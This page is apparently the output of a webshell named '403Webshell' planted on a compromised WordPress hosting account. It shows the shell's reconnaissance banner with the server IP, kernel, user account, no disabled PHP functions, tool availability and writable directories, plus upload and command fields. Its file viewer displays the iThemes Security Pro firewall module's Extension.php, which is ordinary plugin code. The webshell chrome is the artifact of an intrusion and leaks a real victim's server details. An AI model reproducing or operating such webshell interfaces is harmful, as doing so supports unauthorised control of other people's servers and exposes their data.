403Webshell
Server IP : 104.21.14.103  /  Your IP : 18.191.103.28
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/giankuin/dietcontrungnhanh.com/wp-content/plugins/ithemes-security-pro/core/modules/firewall/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/giankuin/dietcontrungnhanh.com/wp-content/plugins/ithemes-security-pro/core/modules/firewall/Extension.php
<?php

namespace iThemesSecurity\Modules\Firewall;

use iThemesSecurity\Lib\Lockout;
use iThemesSecurity\Strauss\Patchstack\Extensions\ExtensionInterface;

class Extension implements ExtensionInterface {

	/** @var \ITSEC_Lockout */
	private $lockout;

	public function __construct( \ITSEC_Lockout $lockout ) { $this->lockout = $lockout; }

	public function logRequest( $ruleId, $bodyData, $blockType ) {
		$code = $blockType . '::' . $ruleId;
		$data = [
			'body_data'  => $bodyData,
			'user_agent' => $_SERVER['HTTP_USER_AGENT'] ?? '',
			'method'     => $_SERVER['REQUEST_METHOD'] ?? '',
		];

		if ( $blockType === 'BLOCK' ) {
			$context = new Lockout\Host_Context( 'firewall' );

			if ( \ITSEC_Lib_IP_Detector::is_configured() ) {
				$this->lockout->do_lockout( $context );
			} else {
				$this->lockout->execute_lock( $context->make_execute_lock_context() );
			}

			\ITSEC_Log::add_action( 'firewall', $code, $data );
		} else {
			\ITSEC_Log::add_notice( 'firewall', $code, $data );
		}
	}

	public function canBypass( $isMuCall ) {
		if ( ! \ITSEC_Lib_IP_Detector::is_configured() ) {
			return false;
		}

		return \ITSEC_Lib::is_ip_whitelisted( $this->getIpAddress() );
	}

	public function isBlocked( $minutes, $blockTime, $attempts ) {
		if ( ! \ITSEC_Lib_IP_Detector::is_configured() ) {
			return false;
		}

		return $this->lockout->is_host_locked_out( $this->getIpAddress() );
	}

	public function forceExit( $ruleId ) {
		$this->lockout->execute_lock( $this->lockout_context()->make_execute_lock_context() );
	}

	public function getIpAddress() {
		return \ITSEC_Lib::get_ip();
	}

	public function getHostName() {
		return parse_url( home_url(), PHP_URL_HOST );
	}

	public function isWhitelisted( $whitelistRules, $request ) {
		return false;
	}

	public function isFileUploadRequest() {
		return isset( $_FILES ) && count( $_FILES ) > 0;
	}

	private function lockout_context(): Lockout\Context {
		return new Lockout\Host_Context( 'firewall' );
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit